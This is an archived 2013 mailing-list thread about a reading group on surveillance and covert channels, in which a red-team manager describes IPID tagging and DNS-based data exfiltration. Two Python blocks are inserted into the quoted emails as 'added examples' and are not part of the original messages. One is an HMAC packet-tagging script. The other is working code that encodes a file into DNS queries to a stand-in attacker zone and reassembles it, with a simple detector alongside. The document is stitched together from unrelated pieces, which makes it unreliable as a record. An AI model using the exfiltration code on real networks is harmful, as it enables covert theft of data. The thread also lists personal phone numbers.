Ray -
Great real-world report... my direct experience in all this is dated by
at least 6 years, but most of it nearly 10 years old now... time flies!
The only question I have about your response below is about the question
of bandwidth... while *some* important data/secrets are large, many are
not... a leak is a leak, no? And an effective (albeit low bandwidth)
covert channel can leak a LOT over enough time?
- Steve
WRT the Covert Channels paper -
Header extensions and IP options are not actually practical
channels. They sound good but in practice they run afoul of the
problem that network equipment, particularly routers, process packets
in hardware - unless they have unusual extensions or IP Options, in
which case the packets are thrown up to the software layer. That
means they will be slower, all through the Internet, and they are
easily detected.
We've used the IPID trick but not for a covert channel. We wanted to
be able to distinguish our traffic from actual attackers (use control
for red teams), so we created an HMAC of the packet and inserted the
first few bytes into the IPID field. At the target's end, they can
use a tool fed from tcpdump or other appropriate tool and check
whether the IPID bytes match our expected value - we use a shared
secret salt.
Most of the other tricks are low bandwidth - not really useful for
gigabytes of information.
The two most commonly used covert channels in current malware are
http and DNS. The sheer volume of http makes it impractical to catch
all requests - many typical, public, web-pages include requests to
dozens of web-sites other than the primary one. The many web-bug
tricks and advertising spyware activities make this a really large
pool of bits in which an adversary can hide. We've used the trick of
sending data out as DNS lookups against customer networks and it works
like a charm. We literally showed a security manager (later the CISO
for the organization) the exfiltration and he didn't believe it twice,
despite the evidence of displaying the exfiltrated file on our
external web-site.
I have a copy of the Loki source code (very clean) and sending
unrequested ICMP echo responses still works in some places. The
author of Loki, who went by the name Mixter, created another covert
channel that simply uses alternate IP protocols. Some routers will
route any IP protocol by default while others will only route those IP
protocols explicitly specified.
Ray Parks
Consilient Heuristician/IDART Program Manager
V: 505-844-4024 M: 505-238-9359 P: 505-951-6084
NIPR: rcpa...@sandia.gov
SIPR: rcpar...@sandia.doe.sgov.gov (send NIPR reminder)
JWICS: dopa...@doe.ic.gov (send NIPR reminder)
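A worked version of the IPID-tagging trick Ray describes above, added here as an example; it is not Ray's or IDART's tooling. Assumptions not stated in the message: the MAC is HMAC-SHA256 keyed with the shared secret, computed over the fields a router leaves alone (source and destination address, protocol number, transport payload) and never over the IPID, TTL or header checksum, which change in transit; the first two bytes of the MAC fill the 16-bit IPID. The addresses, payload and secret are constructed test values.

```python
import hashlib
import hmac
import ipaddress
import struct

# Constructed value; the real salt is agreed out of band with the target's defenders.
SHARED_SECRET = b"constructed-red-team-salt"


def ip_checksum(data: bytes) -> int:
    """Standard one's-complement IPv4 header checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def tag_material(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Bytes the HMAC covers: fields that survive transit unchanged and are not the IPID itself.
    TTL, header checksum and IPID are excluded because every hop rewrites them (assumed design)."""
    return (ipaddress.IPv4Address(src).packed
            + ipaddress.IPv4Address(dst).packed
            + bytes([proto])
            + payload)


def ipid_tag(secret: bytes, src: str, dst: str, proto: int, payload: bytes) -> int:
    """First two bytes of HMAC-SHA256 over the stable fields, as a 16-bit IPID value."""
    mac = hmac.new(secret, tag_material(src, dst, proto, payload), hashlib.sha256).digest()
    return struct.unpack("!H", mac[:2])[0]


def build_tagged_packet(secret: bytes, src: str, dst: str, proto: int,
                        payload: bytes, ttl: int = 64) -> bytes:
    """Red-team side: assemble an IPv4 packet (no options) whose IPID carries the tag."""
    total_length = 20 + len(payload)
    ipid = ipid_tag(secret, src, dst, proto, payload)
    header = struct.pack("!BBHHHBBH4s4s",
                         0x45, 0, total_length, ipid, 0, ttl, proto, 0,
                         ipaddress.IPv4Address(src).packed,
                         ipaddress.IPv4Address(dst).packed)
    header = header[:10] + struct.pack("!H", ip_checksum(header)) + header[12:]
    return header + payload


def is_red_team_packet(secret: bytes, packet: bytes) -> bool:
    """Defender side (fed from tcpdump or similar): recompute the tag from the captured
    packet and compare it to the IPID that actually arrived."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return False
    ihl = (packet[0] & 0x0F) * 4
    total_length, ipid = struct.unpack("!HH", packet[2:6])
    if ihl < 20 or total_length > len(packet) or ihl > total_length:
        return False
    proto = packet[9]
    src = str(ipaddress.IPv4Address(packet[12:16]))
    dst = str(ipaddress.IPv4Address(packet[16:20]))
    payload = packet[ihl:total_length]
    expected = ipid_tag(secret, src, dst, proto, payload)
    # Constant-time compare; note 16 bits still gives a 1-in-65536 chance match per packet.
    return hmac.compare_digest(struct.pack("!H", ipid), struct.pack("!H", expected))


def hop_in_transit(packet: bytes) -> bytes:
    """Simulate one router hop: decrement TTL and fix the checksum, leaving the IPID alone."""
    hdr = bytearray(packet[:20])
    hdr[8] -= 1
    hdr[10:12] = b"\x00\x00"
    hdr[10:12] = struct.pack("!H", ip_checksum(bytes(hdr)))
    return bytes(hdr) + packet[20:]


if __name__ == "__main__":
    # Constructed test-net addresses (RFC 5737) and a trivial payload.
    pkt = build_tagged_packet(SHARED_SECRET, "192.0.2.10", "198.51.100.20", 6,
                              b"GET / HTTP/1.0\r\n\r\n")
    print("ours after a hop:", is_red_team_packet(SHARED_SECRET, hop_in_transit(pkt)))
    print("checked with wrong secret:", is_red_team_packet(b"other", pkt))
```

Sixteen bits of tag means a random IPID matches by chance once in 65,536 packets, so the check attributes a stream of packets rather than any single one. A NAT that rewrites the source address, or any middlebox that regenerates IPIDs, breaks the match, so the defender's tap has to sit where packets still arrive with the red team's addresses and IPIDs intact.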
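The DNS exfiltration Ray describes (a file sent out as lookups against a domain the attacker controls) as an added example with a simple defender-side check alongside it; this is not the tooling from that engagement. Assumptions: the file is chunked into base32 labels, each prefixed with a sequence number for reassembly at the attacker's authoritative server; the attacker's zone is the documentation domain example.net; the "secret file" and the benign background queries are constructed; and the detector approximates the registrable domain as the last two labels of a name.

```python
import base64
import hashlib
import math
from collections import defaultdict

# Constructed attacker-controlled zone; its authoritative server logs every query it receives.
EXFIL_ZONE = "example.net"
MAX_LABEL = 63       # RFC 1035 label limit
MAX_NAME = 253       # practical limit for a full name
CHUNK_BYTES = 30     # 30 raw bytes -> 48 base32 characters, comfortably under MAX_LABEL


def encode_queries(data: bytes, zone: str = EXFIL_ZONE) -> list:
    """Sender side: split data into numbered base32 labels, <seq>.<chunk>.<zone>.
    Base32 rather than base64 because DNS names are case-insensitive and resolvers may fold case."""
    names = []
    for seq, offset in enumerate(range(0, len(data), CHUNK_BYTES)):
        chunk = base64.b32encode(data[offset:offset + CHUNK_BYTES]).decode().rstrip("=").lower()
        name = "%d.%s.%s" % (seq, chunk, zone)
        if len(chunk) > MAX_LABEL or len(name) > MAX_NAME:
            raise ValueError("label or name too long")
        names.append(name)
    return names


def decode_queries(names, zone: str = EXFIL_ZONE) -> bytes:
    """Receiver side: reassemble from the zone's query log; queries may arrive in any order."""
    suffix = "." + zone.lower()
    chunks = {}
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        seq_label, chunk = name[:-len(suffix)].split(".", 1)
        padded = chunk.upper() + "=" * (-len(chunk) % 8)   # restore the base32 padding
        chunks[int(seq_label)] = base64.b32decode(padded)
    return b"".join(chunks[seq] for seq in sorted(chunks))


def shannon_entropy(s: str) -> float:
    """Bits per character: base32 of compressed or encrypted data sits near 5, hostnames near 2-3."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def suspicious_zones(query_names, min_unique: int = 20, min_entropy: float = 3.5) -> dict:
    """Defender side: flag zones that receive many distinct, high-entropy subdomains.
    Returns {zone: (unique_subdomains, mean_entropy_of_longest_label)}."""
    per_zone = defaultdict(set)
    for name in query_names:
        labels = name.lower().rstrip(".").split(".")
        if len(labels) < 3:
            continue
        zone = ".".join(labels[-2:])          # crude: last two labels as the registrable domain
        per_zone[zone].add(".".join(labels[:-2]))
    flagged = {}
    for zone, subs in per_zone.items():
        if len(subs) < min_unique:
            continue
        mean_h = sum(shannon_entropy(max(sub.split("."), key=len)) for sub in subs) / len(subs)
        if mean_h >= min_entropy:
            flagged[zone] = (len(subs), round(mean_h, 2))
    return flagged


# Constructed "secret file": 768 pseudo-random bytes, so the labels look like real exfil traffic.
SECRET_FILE = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(24))
# Constructed benign background traffic: a few hostnames queried over and over.
BENIGN = ["www.example.com", "mail.example.com", "cdn.example.com", "www.example.org"] * 50


def demo() -> tuple:
    """Round-trip the file through DNS names and run the detector over the mixed log."""
    queries = encode_queries(SECRET_FILE)
    recovered = decode_queries(reversed(queries))   # out of order, as a busy log would be
    flagged = suspicious_zones(BENIGN + queries)
    return recovered == SECRET_FILE, len(queries), sorted(flagged)


if __name__ == "__main__":
    print(demo())
```

The sender never needs a direct route to the attacker: any recursive resolver that will forward the query, including the customer's own, delivers the labels to the zone's authoritative server. The detector is deliberately crude (unique-subdomain count plus label entropy per zone); real deployments also watch TXT/NULL record use, query volume per client and long names to a newly seen domain.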
On Oct 18, 2013, at 8:27 PM, Steve Smith wrote:
Forgot to relate the tidbit that motivated me to update the group:
The "Covert Channels" reading, which is a very specialized example of
Steganography (by my measure) has some very clever ideas in it which
I'd never encountered before... all kind of obvious once described
but nevertheless quite clever.
- Steve
I don't know if anyone (else) is doing the reading for this course....
I lagged a bit but am just now catching up... the first 5 readings
were history/law and *very* timely and relevant to the current
situation with the NSA, etc.
The following are more technical:
Secure Email
Tor (secure - obfuscated?) Routing
Network Traffic Analysis
Steganography
Covert Channels
Chat (off the record)
.....
I've done my time working with or studying all of these at a fairly
limited level and found each of the resources offered to be very
well chosen... a good review for me and a good introduction for
anyone with modest technical knowledge. They are also "bite
sized"... I find the reading assignment for each week requiring less
than an hour, though one can use these as a point of departure that
could consume a whole week!
I'm glad to hear that our best and brightest are being taught these
things.
- Steve
I'm in. A number of journos are interested in/worried about this.
-tj
On Mon, Sep 9, 2013 at 12:30 PM, Steve Smith <sasm...@swcp.com> wrote:
Cody -
I think you just started one (by asking).
I suggest a Google Group for discussion and following the class
schedule even if we don't have the benefit of lecture and class
discussions.
3 or more is a good number... if Owen's alerting us indicates
interest, we already have a Quorum!?
- Steve
that seems like a very cool reading list. Are you thinking of
starting up a reading group?
Cody Smith
On Mon, Sep 9, 2013 at 10:09 AM, Owen Densmore <o...@backspaces.net> wrote:
Another gem from twitter:
Ed Felten
Preliminary syllabus for my "Surveillance and
Countermeasures" seminar: http://ow.ly/oHs9a
Retweeted by BrendanEich
http://www.cs.princeton.edu/courses/archive/fall13/cos597G/
Sounds fascinating .. and not all tech, lots of history
and spy craft.
-- Owen
============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe
http://redfish.com/mailman/listinfo/friam_redfish.com
============================================================
--
==========================================
J. T. Johnson
Institute for Analytic Journalism -- Santa Fe, NM USA
505.577.6482(c) 505.473.9646(h)
Twitter: jtjohnson
http://www.jtjohnson.com
t...@jtjohnson.com
==========================================